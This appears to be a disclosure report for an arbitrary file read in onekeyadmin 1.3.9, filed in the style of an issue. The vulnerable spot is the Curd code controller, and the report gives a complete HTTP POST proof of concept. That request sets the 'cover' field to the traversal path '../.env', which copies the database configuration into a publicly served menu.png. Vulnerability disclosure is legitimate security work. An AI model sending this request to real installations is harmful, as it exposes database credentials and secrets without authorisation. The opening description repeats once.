Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file reading
Vulnerability Details:
Vulnerability location
app\admin\controller\Curd#code Here the file_get_contents function is called without any filtering
So we can write the file we want to read into menu.png to cause any file to be read
Vulnerability recurrence
Here we read the database configuration file .env in the root directory
Vulnerability affects product:onekeyadmin

Vulnerability affects version 1.3.9
Vulnerability type:file reading
Vulnerability Details:
Vulnerability location
app\admin\controller\Curd#code Here the file_get_contents function is called without any filtering
So we can write the file we want to read into menu.png to cause any file to be read
Vulnerability recurrence
Here we read the database configuration file .env in the root directory
poc
`POST /admin1/curd/code HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 59
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/curd/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"name":"test","title":"test","cover":"../.env","table":[]}`

You can see that the file was successfully written to our menu.png, causing any file to be read

http://192.168.3.129:8091/plugins/test/menu.png
The text was updated successfully, but these errors were encountered: